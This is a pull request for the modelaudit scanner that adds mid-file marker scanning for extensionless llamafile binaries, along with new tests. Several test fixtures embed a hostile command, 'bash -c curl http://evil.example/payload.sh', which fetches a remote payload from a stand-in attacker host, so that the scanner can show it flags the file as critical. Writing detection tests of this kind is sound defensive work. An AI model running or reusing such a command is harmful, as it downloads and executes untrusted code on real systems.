### PR TITLE
test(scanners): cover extensionless llamafile routing

### DIFF
--- a/modelaudit/scanners/llamafile_scanner.py
+++ b/modelaudit/scanners/llamafile_scanner.py
@@ -210,7 +210,21 @@ class LlamafileScanner(BaseScanner):
         try:
             head = self._read_prefix(path_obj, self.preview_bytes)
             tail = self._read_suffix(path_obj, self.preview_bytes)
+            runtime_blobs = [head, tail]
             runtime_preview_bytes = len(head) + len(tail)
+            marker_offset = self._find_casefolded_marker_offset(
+                path_obj,
+                LLAMAFILE_MARKER,
+                LLAMAFILE_ROUTE_SCAN_BYTES,
+            )
+            if marker_offset is not None and not self._offset_is_in_preview_windows(
+                marker_offset,
+                path_obj.stat().st_size,
+                self.preview_bytes,
+            ):
+                middle = self._read_window_around_offset(path_obj, marker_offset, self.preview_bytes)
+                runtime_blobs.append(middle)
+                runtime_preview_bytes += len(middle)
         except OSError as exc:
             result.add_check(
                 name="Llamafile Runtime Preview Read",
@@ -224,7 +238,7 @@ class LlamafileScanner(BaseScanner):
             return result
 
         result.bytes_scanned = runtime_preview_bytes
-        self._scan_runtime_strings(path, head + b"\n" + tail, result)
+        self._scan_runtime_strings(path, b"\n".join(runtime_blobs), result)
 
         payload_bytes_scanned = self._scan_embedded_payload(path_obj, result)
         result.bytes_scanned += payload_bytes_scanned
@@ -508,3 +522,20 @@ class LlamafileScanner(BaseScanner):
         with path.open("rb") as handle:
             handle.seek(file_size - num_bytes)
             return handle.read(num_bytes)
+
+    @staticmethod
+    def _offset_is_in_preview_windows(offset: int, file_size: int, preview_bytes: int) -> bool:
+        """Return whether an offset is already covered by the head or tail preview."""
+        return offset < preview_bytes or offset >= max(0, file_size - preview_bytes)
+
+    @staticmethod
+    def _read_window_around_offset(path: Path, offset: int, num_bytes: int) -> bytes:
+        """Read a bounded preview window centered around a routed marker offset."""
+        file_size = path.stat().st_size
+        window_start = max(0, offset - (num_bytes // 2))
+        window_end = min(file_size, window_start + num_bytes)
+        if window_end - window_start < num_bytes:
+            window_start = max(0, window_end - num_bytes)
+        with path.open("rb") as handle:
+            handle.seek(window_start)
+            return handle.read(window_end - window_start)

--- a/tests/scanners/test_llamafile_scanner.py
+++ b/tests/scanners/test_llamafile_scanner.py
@@ -83,6 +83,22 @@ def test_llamafile_scanner_can_handle_malicious_middle_marker_in_exe(tmp_path: P
     assert any(issue.severity == IssueSeverity.CRITICAL for issue in result.issues)
 
 
+def test_llamafile_scanner_flags_true_middle_runtime_strings(tmp_path: Path) -> None:
+    binary = tmp_path / "middle-runtime.llamafile"
+    binary.write_bytes(
+        b"\x7fELF"
+        + b"\x02\x01\x01\x00"
+        + b"\x00" * 56
+        + b"A" * (2 * 1024 * 1024 + 64)
+        + b"llamafile runtime\nbash -c curl http://evil.example/payload.sh"
+        + b"B" * (2 * 1024 * 1024 + 64)
+    )
+
+    result = LlamafileScanner().scan(str(binary))
+
+    assert any(issue.severity == IssueSeverity.CRITICAL for issue in result.issues)
+
+
 def test_llamafile_scanner_does_not_route_middle_near_match_in_exe(tmp_path: Path) -> None:
     binary = tmp_path / "middle-near-match.exe"
     binary.write_bytes(

--- a/tests/scanners/test_scanner_registry.py
+++ b/tests/scanners/test_scanner_registry.py
@@ -586,7 +586,12 @@ def test_get_scanner_for_path_routes_extensionless_llamafile(tmp_path: Path) -> 
 def test_get_scanner_for_path_routes_extensionless_middle_marker_llamafile(tmp_path: Path) -> None:
     llamafile_path = tmp_path / "llama"
     llamafile_path.write_bytes(
-        b"\x7fELF" + b"\x02\x01\x01\x00" + b"\x00" * 56 + b"A" * (2 * 1024 * 1024 + 64) + b"llamafile runtime"
+        b"\x7fELF"
+        + b"\x02\x01\x01\x00"
+        + b"\x00" * 56
+        + b"A" * (2 * 1024 * 1024 + 64)
+        + b"llamafile runtime"
+        + b"B" * (2 * 1024 * 1024 + 64)
     )
 
     _assert_scanner_for_path(llamafile_path, "llamafile")

--- a/tests/scanners/test_scanner_registry.py
+++ b/tests/scanners/test_scanner_registry.py
@@ -583,6 +583,15 @@ def test_get_scanner_for_path_routes_extensionless_llamafile(tmp_path: Path) -> 
     _assert_scanner_for_path(llamafile_path, "llamafile")
 
 
+def test_get_scanner_for_path_routes_extensionless_middle_marker_llamafile(tmp_path: Path) -> None:
+    llamafile_path = tmp_path / "llama"
+    llamafile_path.write_bytes(
+        b"\x7fELF" + b"\x02\x01\x01\x00" + b"\x00" * 56 + b"A" * (2 * 1024 * 1024 + 64) + b"llamafile runtime"
+    )
+
+    _assert_scanner_for_path(llamafile_path, "llamafile")
+
+
 def test_get_scanner_for_path_routes_extensionless_malicious_llamafile(tmp_path: Path) -> None:
     llamafile_path = tmp_path / "llama"
     llamafile_path.write_bytes(

--- a/tests/test_core.py
+++ b/tests/test_core.py
@@ -974,12 +974,34 @@ def test_scan_file_routes_extensionless_llamafile(tmp_path: Path) -> None:
 def test_scan_file_routes_extensionless_middle_marker_llamafile(tmp_path: Path) -> None:
     extensionless_llamafile = tmp_path / "llama"
     extensionless_llamafile.write_bytes(
-        b"\x7fELF" + b"\x02\x01\x01\x00" + b"\x00" * 56 + b"A" * (2 * 1024 * 1024 + 64) + b"llamafile runtime"
+        b"\x7fELF"
+        + b"\x02\x01\x01\x00"
+        + b"\x00" * 56
+        + b"A" * (2 * 1024 * 1024 + 64)
+        + b"llamafile runtime"
+        + b"B" * (2 * 1024 * 1024 + 64)
     )
 
     result = scan_file(str(extensionless_llamafile))
 
     assert result.scanner_name == "llamafile"
+
+
+def test_scan_file_detects_malicious_extensionless_middle_marker_llamafile(tmp_path: Path) -> None:
+    extensionless_llamafile = tmp_path / "llama"
+    extensionless_llamafile.write_bytes(
+        b"\x7fELF"
+        + b"\x02\x01\x01\x00"
+        + b"\x00" * 56
+        + b"A" * (2 * 1024 * 1024 + 64)
+        + b"llamafile runtime\nbash -c curl http://evil.example/payload.sh"
+        + b"B" * (2 * 1024 * 1024 + 64)
+    )
+
+    result = scan_file(str(extensionless_llamafile))
+
+    assert result.scanner_name == "llamafile"
+    assert any(issue.severity == IssueSeverity.CRITICAL for issue in result.issues)
 
 
 def test_scan_file_detects_malicious_extensionless_llamafile(tmp_path: Path) -> None:

--- a/tests/test_core.py
+++ b/tests/test_core.py
@@ -952,6 +952,17 @@ def test_scan_file_routes_extensionless_llamafile(tmp_path: Path) -> None:
     assert result.scanner_name == "llamafile"
 
 
+def test_scan_file_routes_extensionless_middle_marker_llamafile(tmp_path: Path) -> None:
+    extensionless_llamafile = tmp_path / "llama"
+    extensionless_llamafile.write_bytes(
+        b"\x7fELF" + b"\x02\x01\x01\x00" + b"\x00" * 56 + b"A" * (2 * 1024 * 1024 + 64) + b"llamafile runtime"
+    )
+
+    result = scan_file(str(extensionless_llamafile))
+
+    assert result.scanner_name == "llamafile"
+
+
 def test_scan_file_detects_malicious_extensionless_llamafile(tmp_path: Path) -> None:
     extensionless_llamafile = tmp_path / "llama"
     extensionless_llamafile.write_bytes(


### PR DESCRIPTION
## Summary
- Add registry coverage for an extensionless executable whose `llamafile` marker appears beyond the old prefix-only routing window.
- Add full `scan_file` coverage for the same extensionless middle-marker path.

## Why
Recent routing changes separately covered extensionless scanner participation and middle-marker Llamafile detection. This pins their combined path so extensionless Llamafiles with markers outside the old head probe do not fall through as `unknown`.

## Validation
- `UV_CACHE_DIR=/tmp/modelaudit-uv-cache PROMPTFOO_DISABLE_TELEMETRY=1 uv run pytest tests/scanners/test_scanner_registry.py::test_get_scanner_for_path_routes_extensionless_middle_marker_llamafile tests/test_core.py::test_scan_file_routes_extensionless_middle_marker_llamafile`
- `UV_CACHE_DIR=/tmp/modelaudit-uv-cache uv run ruff format modelaudit/ packages/modelaudit-picklescan/src packages/modelaudit-picklescan/tests tests/`
- `UV_CACHE_DIR=/tmp/modelaudit-uv-cache uv run ruff check --fix modelaudit/ packages/modelaudit-picklescan/src packages/modelaudit-picklescan/tests tests/`
- `UV_CACHE_DIR=/tmp/modelaudit-uv-cache uv run mypy modelaudit/ packages/modelaudit-picklescan/src packages/modelaudit-picklescan/tests tests/`
- `UV_CACHE_DIR=/tmp/modelaudit-uv-cache PROMPTFOO_DISABLE_TELEMETRY=1 uv run pytest -n auto -m "not slow and not integration" --maxfail=1`
